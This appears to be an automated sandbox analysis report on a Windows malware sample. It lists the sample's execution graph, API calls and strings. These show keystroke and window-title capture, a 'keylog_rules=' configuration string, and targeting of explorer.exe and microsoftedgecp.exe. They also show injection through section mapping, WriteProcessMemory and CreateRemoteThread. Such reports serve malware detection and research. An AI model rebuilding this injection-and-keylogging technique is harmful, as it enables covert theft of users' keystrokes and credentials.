                            Dynamic/Decrypted Code Coverage:97.5%
                            Signature Coverage:17.8%
                            Total number of Nodes:320
                            Total number of Limit Nodes:4
                            execution_graph 1016 7d182d 1017 7d1838 RtlEnterCriticalSection lstrlenW 1016->1017 1018 7d18a8 RtlLeaveCriticalSection Sleep 1017->1018 1024 7d1854 1017->1024 1018->1017 1021 7d29eb VirtualQuery GetProcessHeap HeapFree 1021->1024 1024->1018 1024->1021 1025 7d25a4 1024->1025 1031 7d200d 1024->1031 1042 7d29ae VirtualFree 1024->1042 1043 7d2a09 GetProcessHeap RtlAllocateHeap 1024->1043 1026 7d25b9 CryptBinaryToStringA 1025->1026 1027 7d25e8 1025->1027 1026->1027 1028 7d25cc 1026->1028 1027->1024 1044 7d2a09 GetProcessHeap RtlAllocateHeap 1028->1044 1030 7d25d7 CryptBinaryToStringA 1030->1027 1032 7d2030 1031->1032 1033 7d2023 lstrlen 1031->1033 1045 7d2a09 GetProcessHeap RtlAllocateHeap 1032->1045 1033->1032 1035 7d2038 lstrcat 1036 7d206d lstrcat 1035->1036 1037 7d2074 1035->1037 1036->1037 1046 7d20a1 1037->1046 1040 7d29eb 3 API calls 1041 7d2097 1040->1041 1041->1024 1042->1024 1043->1024 1044->1030 1045->1035 1080 7d240f 1046->1080 1050 7d20ce 1085 7d298a lstrlen MultiByteToWideChar 1050->1085 1052 7d20dd 1086 7d24cc RtlZeroMemory 1052->1086 1055 7d212f RtlZeroMemory 1057 7d2164 1055->1057 1056 7d29eb 3 API calls 1058 7d2084 1056->1058 1061 7d23f1 1057->1061 1063 7d2192 1057->1063 1088 7d243d 1057->1088 1058->1040 1060 7d23d7 1060->1061 1062 7d29eb 3 API calls 1060->1062 1061->1056 1062->1061 1063->1060 1097 7d2a09 GetProcessHeap RtlAllocateHeap 1063->1097 1065 7d2262 wsprintfW 1066 7d2288 1065->1066 1070 7d22f5 1066->1070 1098 7d2a09 GetProcessHeap RtlAllocateHeap 1066->1098 1068 7d22c2 wsprintfW 1068->1070 1069 7d23b4 1071 7d29eb 3 API calls 1069->1071 1070->1069 1099 7d2a09 GetProcessHeap RtlAllocateHeap 1070->1099 1073 7d23c8 1071->1073 1073->1060 1074 7d29eb 3 API calls 1073->1074 1074->1060 1075 7d23ad 1078 7d29eb 3 API calls 1075->1078 1076 7d2340 1076->1075 1100 7d29bd VirtualAlloc 1076->1100 1078->1069 1079 7d239a RtlMoveMemory 1079->1075 1081 7d2419 1080->1081 1083 7d20c0 1080->1083 1082 7d2841 2 API calls 1081->1082 1082->1083 1084 7d2a09 GetProcessHeap RtlAllocateHeap 1083->1084 1084->1050 1085->1052 1087 7d20ed 1086->1087 1087->1055 1087->1061 1089 7d24ab 1088->1089 1091 7d244a 1088->1091 1089->1063 1090 7d244e DnsQuery_W 1090->1091 1091->1089 1091->1090 1092 7d248d DnsFree inet_ntoa 1091->1092 1092->1091 1093 7d24ad 1092->1093 1101 7d2a09 GetProcessHeap RtlAllocateHeap 1093->1101 1095 7d24b7 1102 7d298a lstrlen MultiByteToWideChar 1095->1102 1097->1065 1098->1068 1099->1076 1100->1079 1101->1095 1102->1089 1103 7d162b 1104 7d163c 1103->1104 1109 7d16aa 1103->1109 1105 7d164b GetKeyboardState 1104->1105 1104->1109 1106 7d165c ToUnicode 1105->1106 1105->1109 1107 7d1684 1106->1107 1107->1109 1110 7d16b9 RtlEnterCriticalSection 1107->1110 1111 7d17ce RtlLeaveCriticalSection 1110->1111 1112 7d16d2 lstrlenW 1110->1112 1111->1109 1113 7d16ed lstrlenW 1112->1113 1114 7d17bd 1112->1114 1118 7d1702 1113->1118 1114->1111 1115 7d174e GetForegroundWindow 1115->1114 1117 7d175a GetWindowTextW 1115->1117 1116 7d1723 1116->1114 1129 7d17dc 1116->1129 1120 7d177a lstrcmpW 1117->1120 1121 7d1771 GetClassNameW 1117->1121 1118->1115 1118->1116 1123 7d17bf lstrcatW 1120->1123 1124 7d178b lstrcpyW 1120->1124 1121->1120 1122 7d172f wsprintfW 1125 7d17b6 1122->1125 1123->1114 1126 7d17dc 4 API calls 1124->1126 1128 7d29eb 3 API calls 1125->1128 1127 7d1798 wsprintfW 1126->1127 1127->1125 1128->1114 1132 7d2a09 GetProcessHeap RtlAllocateHeap 1129->1132 1131 7d17ed GetLocalTime wsprintfW 1131->1122 1132->1131 1133 7d1581 1134 7d158e 1133->1134 1135 7d1623 1134->1135 1136 7d15a7 GlobalFix 1134->1136 1136->1135 1137 7d15b5 1136->1137 1138 7d15e4 1137->1138 1139 7d15c0 1137->1139 1154 7d293e 1138->1154 1141 7d15c5 lstrlenW 1139->1141 1142 7d15f2 1139->1142 1153 7d2a09 GetProcessHeap RtlAllocateHeap 1141->1153 1144 7d2724 VirtualQuery 1142->1144 1146 7d15fb 1144->1146 1145 7d15d8 lstrcatW 1145->1142 1147 7d15ff lstrlenW 1146->1147 1148 7d161b GlobalUnWire 1146->1148 1147->1148 1149 7d160a 1147->1149 1148->1135 1150 7d16b9 19 API calls 1149->1150 1151 7d1614 1150->1151 1152 7d29eb 3 API calls 1151->1152 1152->1148 1153->1145 1155 7d294d lstrlen 1154->1155 1156 7d2982 1154->1156 1161 7d2a09 GetProcessHeap RtlAllocateHeap 1155->1161 1156->1142 1158 7d2963 MultiByteToWideChar 1158->1156 1159 7d297b 1158->1159 1160 7d29eb 3 API calls 1159->1160 1160->1156 1161->1158 770 7d9ae0 771 7d9ca4 770->771 772 7d9aeb 770->772 771->771 773 7d9bfa LoadLibraryA 772->773 776 7d9c3f VirtualProtect VirtualProtect 772->776 774 7d9c11 773->774 774->772 777 7d9c23 GetProcAddress 774->777 776->771 777->774 778 7d9c39 777->778 779 7d1000 780 7d1007 779->780 781 7d1010 779->781 783 7d1016 780->783 822 7d2724 VirtualQuery 783->822 786 7d1098 786->781 788 7d102c RtlMoveMemory 789 7d104d 788->789 790 7d1072 NtUnmapViewOfSection GetCurrentProcessId 788->790 879 7d2a09 GetProcessHeap RtlAllocateHeap 789->879 792 7d109f 790->792 793 7d1093 790->793 854 7d10a5 792->854 793->786 825 7d13ae RtlZeroMemory VirtualQuery 793->825 795 7d1053 RtlMoveMemory 795->790 796 7d10a4 798 7d2a09 GetProcessHeap RtlAllocateHeap 796->798 799 7d10bf 798->799 800 7d2a09 GetProcessHeap RtlAllocateHeap 799->800 801 7d10cc wsprintfA 800->801 805 7d10f3 801->805 802 7d276d OpenFileMappingA MapViewOfFile 802->805 803 7d129a Sleep 803->805 804 7d2841 lstrlen lstrlen 804->805 805->802 805->803 805->804 806 7d275a UnmapViewOfFile FindCloseChangeNotification 805->806 821 7d1148 805->821 806->803 807 7d2a09 GetProcessHeap RtlAllocateHeap 808 7d1150 RtlMoveMemory CreateToolhelp32Snapshot 807->808 809 7d1171 Process32First 808->809 808->821 810 7d118d 809->810 811 7d127e CloseHandle 809->811 813 7d1190 CharLowerA 810->813 811->821 812 7d29eb VirtualQuery GetProcessHeap HeapFree 812->821 814 7d11ab lstrcmpi 813->814 815 7d1266 Process32Next 813->815 814->815 814->821 815->813 815->821 816 7d12ae 16 API calls 816->821 817 7d26c9 OpenProcess IsWow64Process IsWow64Process CloseHandle 817->821 818 7d2724 VirtualQuery 818->821 819 7d1208 lstrcmpi 819->821 820 7d18bf 30 API calls 820->821 821->805 821->807 821->811 821->812 821->815 821->816 821->817 821->818 821->819 821->820 823 7d101e 822->823 823->786 824 7d2a09 GetProcessHeap RtlAllocateHeap 823->824 824->788 826 7d13e4 825->826 880 7d2a09 GetProcessHeap RtlAllocateHeap 826->880 828 7d1402 GetModuleFileNameA 881 7d2a09 GetProcessHeap RtlAllocateHeap 828->881 830 7d1418 GetCurrentProcessId wsprintfA 882 7d2799 CryptAcquireContextA 830->882 833 7d145f RtlInitializeCriticalSection 887 7d2a09 GetProcessHeap RtlAllocateHeap 833->887 834 7d151b 915 7d29eb 834->915 838 7d147f Sleep 888 7d25f1 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 838->888 839 7d29eb 3 API calls 841 7d1529 RtlExitUserThread 839->841 851 7d1533 841->851 842 7d1496 GetModuleHandleA GetProcAddress 843 7d14b5 842->843 844 7d14c6 GetModuleHandleA GetProcAddress 842->844 896 7d1f3a 843->896 846 7d14d9 844->846 847 7d14ea GetModuleHandleA 844->847 848 7d1f3a 3 API calls 846->848 906 7d1e89 847->906 848->847 851->792 852 7d25f1 10 API calls 853 7d1501 CreateThread CloseHandle 852->853 853->834 929 7d2a09 GetProcessHeap RtlAllocateHeap 854->929 856 7d10bf 930 7d2a09 GetProcessHeap RtlAllocateHeap 856->930 858 7d10cc wsprintfA 862 7d10f3 858->862 860 7d129a Sleep 860->862 861 7d2841 lstrlen lstrlen 861->862 862->860 862->861 878 7d1148 862->878 931 7d276d OpenFileMappingA 862->931 991 7d275a UnmapViewOfFile FindCloseChangeNotification 862->991 865 7d1150 RtlMoveMemory CreateToolhelp32Snapshot 866 7d1171 Process32First 865->866 865->878 867 7d118d 866->867 868 7d127e CloseHandle 866->868 870 7d1190 CharLowerA 867->870 868->878 869 7d29eb 3 API calls 869->878 871 7d11ab lstrcmpi 870->871 872 7d1266 Process32Next 870->872 871->872 871->878 872->870 872->878 875 7d2724 VirtualQuery 875->878 876 7d1208 lstrcmpi 876->878 878->862 878->868 878->869 878->872 878->875 878->876 934 7d2a09 GetProcessHeap RtlAllocateHeap 878->934 935 7d12ae 878->935 954 7d26c9 OpenProcess 878->954 960 7d18bf 878->960 879->795 880->828 881->830 883 7d27bf CryptCreateHash lstrlen CryptHashData CryptGetHashParam 882->883 884 7d1445 CreateMutexA GetLastError 882->884 885 7d2805 wsprintfA 883->885 884->833 884->834 885->885 886 7d2827 CryptDestroyHash CryptReleaseContext 885->886 886->884 887->838 889 7d2631 888->889 890 7d2681 CloseHandle 889->890 891 7d2671 Thread32Next 889->891 892 7d263d OpenThread 889->892 890->842 891->889 893 7d2658 SuspendThread 892->893 894 7d2660 ResumeThread 892->894 895 7d2666 CloseHandle 893->895 894->895 895->891 897 7d1fad 896->897 898 7d1f44 896->898 897->844 898->897 920 7d1fea VirtualProtect 898->920 900 7d1f5b 900->897 921 7d29bd VirtualAlloc 900->921 902 7d1f67 903 7d1f71 RtlMoveMemory 902->903 904 7d1f84 902->904 903->904 922 7d1fea VirtualProtect 904->922 907 7d2724 VirtualQuery 906->907 908 7d1e93 907->908 909 7d14fa 908->909 923 7d1ed8 908->923 909->852 913 7d1eba 913->909 928 7d1fea VirtualProtect 913->928 916 7d2724 VirtualQuery 915->916 917 7d29f3 916->917 918 7d1522 917->918 919 7d29f7 GetProcessHeap HeapFree 917->919 918->839 919->918 920->900 921->902 922->897 924 7d1e9e 923->924 925 7d1eea 923->925 924->909 927 7d1fea VirtualProtect 924->927 925->924 926 7d1f04 lstrcmp 925->926 926->924 926->925 927->913 928->909 929->856 930->858 932 7d2794 931->932 933 7d2781 MapViewOfFile 931->933 932->862 933->932 934->865 936 7d12c5 935->936 937 7d13a4 935->937 936->937 992 7d29bd VirtualAlloc 936->992 937->878 939 7d12d9 lstrlen 993 7d2a09 GetProcessHeap RtlAllocateHeap 939->993 941 7d12f0 942 7d1351 941->942 994 7d2841 lstrlen lstrlen 941->994 943 7d29eb 3 API calls 942->943 952 7d1375 943->952 946 7d1399 1000 7d29ae VirtualFree 946->1000 947 7d1329 RtlMoveMemory 996 7d2569 947->996 948 7d1353 RtlMoveMemory 949 7d2569 2 API calls 948->949 949->942 952->946 953 7d1388 PathMatchSpecA 952->953 953->946 953->952 955 7d271c 954->955 956 7d26e7 IsWow64Process 954->956 955->878 957 7d26f8 IsWow64Process 956->957 958 7d270a 956->958 957->958 959 7d2715 CloseHandle 957->959 958->959 959->955 961 7d2724 VirtualQuery 960->961 962 7d18d9 961->962 963 7d18eb OpenProcess 962->963 964 7d1b1c 962->964 963->964 965 7d1904 963->965 964->878 966 7d2724 VirtualQuery 965->966 967 7d190b 966->967 967->964 968 7d1919 NtSetInformationProcess 967->968 969 7d1935 967->969 968->969 1001 7d1b26 969->1001 972 7d1b26 2 API calls 974 7d197c 972->974 973 7d1b19 CloseHandle 973->964 974->973 975 7d1b26 2 API calls 974->975 976 7d19a6 975->976 1007 7d1bbd 976->1007 979 7d1b26 2 API calls 980 7d19d6 RtlMoveMemory RtlMoveMemory NtUnmapViewOfSection 979->980 981 7d1a2b 980->981 982 7d1af4 CreateRemoteThread 980->982 984 7d1a31 CreateMutexA GetLastError 981->984 987 7d1a61 GetModuleHandleA GetProcAddress ReadProcessMemory 981->987 983 7d1b0b CloseHandle 982->983 985 7d1b0d CloseHandle CloseHandle 983->985 984->981 986 7d1a4d CloseHandle Sleep 984->986 985->973 986->984 988 7d1aed 987->988 989 7d1a92 WriteProcessMemory 987->989 988->983 988->985 989->988 990 7d1abc CreateRemoteThread CloseHandle Sleep WriteProcessMemory 989->990 990->988 991->860 992->939 993->941 995 7d130c RtlZeroMemory 994->995 995->947 995->948 997 7d25a1 996->997 999 7d2577 lstrlen RtlMoveMemory 996->999 997->941 999->997 1000->937 1002 7d1b3a 1001->1002 1005 7d195a 1001->1005 1003 7d1b4a NtCreateSection 1002->1003 1004 7d1b69 1002->1004 1003->1004 1004->1005 1006 7d1b7e NtMapViewOfSection 1004->1006 1005->972 1006->1005 1008 7d1bd4 1007->1008 1015 7d1c06 1007->1015 1009 7d1bd6 RtlMoveMemory 1008->1009 1009->1009 1009->1015 1010 7d1c69 1011 7d19b6 NtUnmapViewOfSection 1010->1011 1013 7d1c87 LdrProcessRelocationBlock 1010->1013 1011->979 1012 7d1c17 LoadLibraryA 1012->1011 1012->1015 1013->1010 1013->1011 1014 7d1c47 GetProcAddress 1014->1011 1014->1015 1015->1010 1015->1012 1015->1014

                            Callgraph

                            • Executed
                            • Not Executed
                            • Opacity -> Relevance
                            • Disassembly available
                            callgraph 0 Function_007D25F1 1 Function_007D276D 2 Function_007D29E9 3 Function_007D2569 4 Function_007D29EB 32 Function_007D2724 4->32 5 Function_007D1FEA 6 Function_007D1E66 19 Function_007D1CBF 6->19 7 Function_007D9AE0 8 Function_007D255C 9 Function_007D17DC 44 Function_007D2A09 9->44 10 Function_007D1ED8 11 Function_007D275A 12 Function_007D24CC 13 Function_007D26C9 14 Function_007D2841 15 Function_007D29BD 16 Function_007D1BBD 17 Function_007D243D 17->44 46 Function_007D298A 17->46 18 Function_007D18BF 18->16 18->32 35 Function_007D1B26 18->35 20 Function_007D293E 20->4 20->44 21 Function_007D16B9 21->4 21->9 22 Function_007D1F3A 22->5 22->6 22->15 23 Function_007D1FB4 22->23 36 Function_007D1E26 23->36 24 Function_007D1533 25 Function_007D182D 25->4 26 Function_007D29AE 25->26 33 Function_007D25A4 25->33 41 Function_007D200D 25->41 25->44 27 Function_007D12AE 27->3 27->4 27->8 27->14 27->15 27->26 27->44 28 Function_007D26AE 29 Function_007D13AE 29->0 29->4 29->22 38 Function_007D2799 29->38 29->44 45 Function_007D1E89 29->45 30 Function_007D162B 30->21 31 Function_007D10A5 31->1 31->4 31->11 31->13 31->14 31->18 31->27 31->28 31->32 40 Function_007D288D 31->40 42 Function_007D268F 31->42 31->44 33->44 34 Function_007D3627 36->19 37 Function_007D20A1 37->4 37->12 37->15 37->17 37->40 43 Function_007D240F 37->43 37->44 37->46 39 Function_007D1016 39->1 39->4 39->11 39->13 39->14 39->18 39->27 39->28 39->29 39->31 39->32 39->40 39->42 39->44 41->4 41->37 41->44 43->14 45->5 45->10 45->32 47 Function_007D1581 47->4 47->20 47->21 47->32 47->44 48 Function_007D1000 48->39

                            Executed Functions

                            Function 007D1016 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 193stringsleepprocessCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 007D2724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,007D29F3,-00000001,007D128C), ref: 007D2731
                              • Part of subcall function 007D2A09: GetProcessHeap.KERNEL32(00000008,0000A000,007D10BF), ref: 007D2A0C
                              • Part of subcall function 007D2A09: RtlAllocateHeap.NTDLL(00000000), ref: 007D2A13
                            • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 007D1038
                            • RtlMoveMemory.NTDLL(00000000,?,?), ref: 007D106C
                            • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 007D1075
                            • GetCurrentProcessId.KERNEL32(?,007D1010), ref: 007D107B
                            • wsprintfA.USER32 ref: 007D10E7
                            • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 007D1155
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007D1160
                            • Process32First.KERNEL32(00000000,?), ref: 007D117F
                            • CharLowerA.USER32(?), ref: 007D1199
                            • lstrcmpi.KERNEL32(?,explorer.exe), ref: 007D11B5
                            • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 007D1212
                            • Process32Next.KERNEL32(00000000,00000128), ref: 007D126C
                            • CloseHandle.KERNEL32(00000000), ref: 007D127F
                            • Sleep.KERNELBASE(000003E8), ref: 007D129F
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.507944127.00000000007D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7d1000_explorer.jbxd
                            Similarity
                            • API ID: MemoryMove$HeapProcessProcess32lstrcmpi$AllocateCharCloseCreateCurrentFirstHandleLowerNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtualwsprintf
                            • String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                            • API String ID: 3206029838-2805246637
                            • Opcode ID: 438b03e4875c3ac06689f1fb388fde71ab1b1fe340715c8cd14f417b5e9bcda3
                            • Instruction ID: edb80582f2ea69e14aa6a766921b0740a34d90f8b13d91b7d2a41c2b8239f04f
                            • Opcode Fuzzy Hash: 438b03e4875c3ac06689f1fb388fde71ab1b1fe340715c8cd14f417b5e9bcda3
                            • Instruction Fuzzy Hash: EB51F770205301AFC714EF70DC8997A77BAFB84710F44462BF956C73A2EA3D9E068666
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 007D10A5 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 151stringsleepprocessCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 007D2A09: GetProcessHeap.KERNEL32(00000008,0000A000,007D10BF), ref: 007D2A0C
                              • Part of subcall function 007D2A09: RtlAllocateHeap.NTDLL(00000000), ref: 007D2A13
                            • wsprintfA.USER32 ref: 007D10E7
                              • Part of subcall function 007D276D: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 007D2777
                              • Part of subcall function 007D276D: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,007D10FE), ref: 007D2789
                            • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 007D1155
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007D1160
                            • Process32First.KERNEL32(00000000,?), ref: 007D117F
                            • CharLowerA.USER32(?), ref: 007D1199
                            • lstrcmpi.KERNEL32(?,explorer.exe), ref: 007D11B5
                            • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 007D1212
                            • Process32Next.KERNEL32(00000000,00000128), ref: 007D126C
                            • CloseHandle.KERNEL32(00000000), ref: 007D127F
                            • Sleep.KERNELBASE(000003E8), ref: 007D129F
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.507944127.00000000007D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7d1000_explorer.jbxd
                            Similarity
                            • API ID: FileHeapProcess32lstrcmpi$AllocateCharCloseCreateFirstHandleLowerMappingMemoryMoveNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
                            • String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                            • API String ID: 3018447944-2805246637
                            • Opcode ID: 78f0640839d62fdb45c7dbb57a85540a292d2e9c706ee4c1ed357f07a8971275
                            • Instruction ID: b73469528b867166e7a8631578421eb2f22511b07a61e0cde16c54c9d7ad7718
                            • Opcode Fuzzy Hash: 78f0640839d62fdb45c7dbb57a85540a292d2e9c706ee4c1ed357f07a8971275
                            • Instruction Fuzzy Hash: C041F570304305ABC714AF709C8993A77BAFB94750F40462BF956933D2EB3DAE078662
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 007D9AE0 Relevance: 6.2, APIs: 4, Instructions: 194COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 122 7d9ae0-7d9ae5 123 7d9cad 122->123 124 7d9aeb-7d9af8 122->124 123->123 125 7d9b0a-7d9b0f 124->125 126 7d9b11 125->126 127 7d9b00-7d9b05 126->127 128 7d9b13 126->128 129 7d9b06-7d9b08 127->129 130 7d9b18-7d9b1a 128->130 129->125 129->126 131 7d9b1c-7d9b21 130->131 132 7d9b23-7d9b27 130->132 131->132 132->130 133 7d9b29 132->133 134 7d9b2b-7d9b32 133->134 135 7d9b34-7d9b39 133->135 134->130 134->135 136 7d9b48-7d9b4a 135->136 137 7d9b3b-7d9b44 135->137 138 7d9b4c-7d9b51 136->138 139 7d9b53-7d9b57 136->139 140 7d9bba-7d9bbd 137->140 141 7d9b46 137->141 138->139 143 7d9b59-7d9b5e 139->143 144 7d9b60-7d9b62 139->144 142 7d9bc2-7d9bc5 140->142 141->136 145 7d9bc7-7d9bc9 142->145 143->144 146 7d9b84-7d9b93 144->146 147 7d9b64 144->147 145->142 148 7d9bcb-7d9bce 145->148 150 7d9b95-7d9b9c 146->150 151 7d9ba4-7d9bb1 146->151 149 7d9b65-7d9b67 147->149 148->142 152 7d9bd0-7d9bec 148->152 153 7d9b69-7d9b6e 149->153 154 7d9b70-7d9b74 149->154 150->150 155 7d9b9e 150->155 151->151 156 7d9bb3-7d9bb5 151->156 152->145 157 7d9bee 152->157 153->154 154->149 158 7d9b76 154->158 155->129 156->129 159 7d9bf4-7d9bf8 157->159 160 7d9b78-7d9b7f 158->160 161 7d9b81 158->161 162 7d9c3f-7d9c42 159->162 163 7d9bfa-7d9c10 LoadLibraryA 159->163 160->149 160->161 161->146 165 7d9c45-7d9c4c 162->165 164 7d9c11-7d9c16 163->164 164->159 168 7d9c18-7d9c1a 164->168 166 7d9c4e-7d9c50 165->166 167 7d9c70-7d9ca0 VirtualProtect * 2 165->167 169 7d9c63-7d9c6e 166->169 170 7d9c52-7d9c61 166->170 171 7d9ca4-7d9ca8 167->171 172 7d9c1c-7d9c22 168->172 173 7d9c23-7d9c30 GetProcAddress 168->173 169->170 170->165 171->171 174 7d9caa 171->174 172->173 175 7d9c39-7d9c3c 173->175 176 7d9c32-7d9c37 173->176 174->123 176->164
                            Memory Dump Source
                            • Source File: 00000010.00000002.508073804.00000000007D8000.00000040.80000000.00040000.00000000.sdmp, Offset: 007D8000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7d8000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7cff28d127d2fdd3991eb3a0a7d2856ac7fd7c4b56aedf1412f9e298f0728f2f
                            • Instruction ID: f543fb4747cc00a3aeea2ed6c1b03a3d5163372cf6de0469e99b79e9671cd019
                            • Opcode Fuzzy Hash: 7cff28d127d2fdd3991eb3a0a7d2856ac7fd7c4b56aedf1412f9e298f0728f2f
                            • Instruction Fuzzy Hash: 2E5108B1A542525AD7219A78DCC07B4B7B4EB52324B29073BC6E6CB3C6E7AC5C06C760
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 007D276D Relevance: 3.0, APIs: 2, Instructions: 23fileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 177 7d276d-7d277f OpenFileMappingA 178 7d2794-7d2798 177->178 179 7d2781-7d2791 MapViewOfFile 177->179 179->178
                            APIs
                            • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 007D2777
                            • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,007D10FE), ref: 007D2789
                            Memory Dump Source
                            • Source File: 00000010.00000002.507944127.00000000007D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7d1000_explorer.jbxd
                            Similarity
                            • API ID: File$MappingOpenView
                            • String ID:
                            • API String ID: 3439327939-0
                            • Opcode ID: 038930d5547c06d2e21147c76b6ac4c446806eb6b27aa81053f876861971b8e5
                            • Instruction ID: 6f816b3d8ac26c866d7459f4cba27d805c5ea56e1991ab306a241d0eb36e4b25
                            • Opcode Fuzzy Hash: 038930d5547c06d2e21147c76b6ac4c446806eb6b27aa81053f876861971b8e5
                            • Instruction Fuzzy Hash: 40D01732702231BBE3345A7B6C0CF83AEAEDF86AF1B014026B50DD2150D6648811C2F4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 007D275A Relevance: 3.0, APIs: 2, Instructions: 8fileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 180 7d275a-7d276c UnmapViewOfFile FindCloseChangeNotification
                            APIs
                            • UnmapViewOfFile.KERNEL32(00000000,?,007D129A,00000001), ref: 007D275E
                            • FindCloseChangeNotification.KERNELBASE(?,?,007D129A,00000001), ref: 007D2765
                            Memory Dump Source
                            • Source File: 00000010.00000002.507944127.00000000007D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7d1000_explorer.jbxd
                            Similarity
                            • API ID: ChangeCloseFileFindNotificationUnmapView
                            • String ID:
                            • API String ID: 943506614-0
                            • Opcode ID: 8f1cbc42651c48377f296416c220217ecdfb62064f880dbc8625ce0ad173ae2d
                            • Instruction ID: dda913bcef55fb0b8ad300288c6484ec690c7a72db87406c7becc4cf5a56f82f
                            • Opcode Fuzzy Hash: 8f1cbc42651c48377f296416c220217ecdfb62064f880dbc8625ce0ad173ae2d
                            • Instruction Fuzzy Hash: 57B0123240703097C31427347C4C8DB3F39EE49221309C156F10D81010472C0A0186FE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 007D2A09 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 181 7d2a09-7d2a19 GetProcessHeap RtlAllocateHeap
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,0000A000,007D10BF), ref: 007D2A0C
                            • RtlAllocateHeap.NTDLL(00000000), ref: 007D2A13
                            Memory Dump Source
                            • Source File: 00000010.00000002.507944127.00000000007D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7d1000_explorer.jbxd
                            Similarity
                            • API ID: Heap$AllocateProcess
                            • String ID:
                            • API String ID: 1357844191-0
                            • Opcode ID: ceb429befc759c4b1113c34830be285e6dbc9b0fe6acab7da7e2f7a0b765a4f6
                            • Instruction ID: 1970488dd6713d7f4676d2f1be1e3ddd3e10260572ca206a068ed033c8704f45
                            • Opcode Fuzzy Hash: ceb429befc759c4b1113c34830be285e6dbc9b0fe6acab7da7e2f7a0b765a4f6
                            • Instruction Fuzzy Hash: DDA012B06011006BDD0417A0AD0DF053739A740701F00C1017206C00508D7841048726
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Function 007D18BF Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 208injectionnativesleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 007D2724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,007D29F3,-00000001,007D128C), ref: 007D2731
                            • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000000,00000001), ref: 007D18F4
                            • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 007D192F
                            • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 007D19BF
                            • RtlMoveMemory.NTDLL(00000000,007D3638,00000016), ref: 007D19E6
                            • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 007D1A0E
                            • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 007D1A1E
                            • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 007D1A38
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 007D1A40
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 007D1A4E
                            • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 007D1A55
                            • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 007D1A6B
                            • GetProcAddress.KERNEL32(00000000), ref: 007D1A72
                            • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 007D1A88
                            • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 007D1AB2
                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007D1AC5
